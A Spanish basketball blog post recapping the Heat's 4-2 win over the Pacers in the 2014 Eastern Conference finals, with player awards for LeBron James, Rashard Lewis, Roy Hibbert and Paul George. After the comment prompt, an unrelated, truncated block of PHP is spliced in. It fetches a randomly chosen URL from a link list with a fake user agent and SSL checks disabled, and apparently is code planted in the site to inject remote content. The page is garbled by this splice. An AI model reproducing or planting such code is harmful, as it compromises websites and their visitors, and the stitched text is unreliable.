PO 2014: Resumen Heat 4 – Pacers 2

03 de June de 2014 por txusma

Hubo un momento allá por enero que muchos pensábamos que los Pacers eran candidatos serios no solo al título de su conferencia sinó al anillo. En los playoffs de la temporada anterior habían exigido al máximo a los a la postre campeones y la asombrosa primera parte de la temporada que protagonizaron auguraba una final de conferencia épica con aires de revancha. Pero de repente, a la altura del All-Star, llegó la implosión y el equipo de Frank Vogel se convirtió en un conjunto previsible, falto de ritmo, de ambición y de chispa. Saltaba por los aires cualquier expectativa generada y el camino de Indiana durante el final de la regular y las 2 primeras series de los playoffs parecía más el camino de un ternero hacia el matadero que el galopar poderoso de un general y sus ejércitos hasta el campo de batalla.

Cuando sonó la bocina que indicaba el final del séptimo partido de las finales de la conferencia Este de la temporada pasada, todos sabíamos que ambos equipos se volverían a ver las caras un año más tarde pero no creo que nadie se imaginara las terribles dudas con las que ambos conjunto llegarían al enfrentamiento. Los Heat apenas habían sudado para doblegar a Bobcats y Nets pero ni de lejos habían dejado buenas sensaciones. Por su parte, los Pacers habían sufrido de lo lindo ante los Hawks y habían superado a los Wizards en una eliminatoria llena de altibajos. A la hora de la verdad, Miami ha ido siempre un paso por delante su rival, ha sido capaz de meter una marcha más en cualquier momento. El primer partido acabó resultando un espejismo porque los Pacers no consiguieron igualar el nivel de su rival en ningún otro momento de la eliminatoria y tan solo la peor actuación en un partido de playoffs de la carrera de Lebron James les permitió conseguir una 2ª victoria que además llegó por los pelos. En cambio, los Heat han ido mejorando encuentro a encuentro, como preparándose para la que será la batalla definitiva, la que realmente tenían en mente desde el primer encuentro de la temporada. Al quinteto titular han ido sumándose secundarios que parecen llegar en su mejor momento, algo extremedamente necesario cuando te enfrentas a un conjunto tan profundo como los Spurs. ¿Que han sido los Pacers para estos Heat? ¿Meros sparrings?

Los Heat avanzan a su cuarta final consecutiva, algo que por si solo ya les sitúa a la altura de los mejores equipos de todos los tiempos pero que puede quedar en anécdota si se alzan con su tercer anillo ante otro de los mejores equipos de la historia.

PREMIOS

MVP: A pesar de que su defensa ha estado algo más floja que en otras ocasiones, Lebron James ha vuelto a demostrar que es el mejor jugador de baloncesto sobre la faz de la tierra. Ha acabado promediando 22.8 puntos, 6.3 rebotes, 5.5 asistencias y 2 robos por partido pero hay que tener en cuenta que en el 5º partido se quedó en 7 puntos, 2 rebotes y 4 asistencias por problemas de faltas.

Sorpresa: Ray Allen apareció en el 3er partido y parece que llega en su mejor momento de forma a las finales pero la gran sorpresa de la serie ha sido Rashard Lewis al que no se le esperaba pero que ha aportado todo lo que se le puede pedir a un jugador de banquillo: Ha defendido muy bien a David West, ha abierto el campo gracias a su acierto desde fuera y ha anotado tiros importantes.

Decepción: En la previa ya avisábamos que el papel de Roy Hibbert era una de las claves de la eliminatoria. De su actuación dependía buena parte de las aspiraciones de su equipo. A la hora de la verdad Hibbert ha sido cualquier cosa menos un factor diferencial aunque al menos no ha estado tan desastroso como en las 2 primeras series de estos playoffs. De tordas maneras, el banquillo de los Pacers ha dado todavía más pena. Unos minutitos de Luis Scola, algo de CJ Watson y poco más.

Esfuerzo en vano: Paul George (24p – 5.4r – 4a – 1.8r) no se ha escondido y ha tirado de su equipo en todo momento. Ha estado algo irregular pero habría que ser un superhombre para defender correctamente a Lebron James y mantener a la vez la frescura y el acierto en el apartado ofensivo.

Imágenes | AP Photos / Getty Images

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>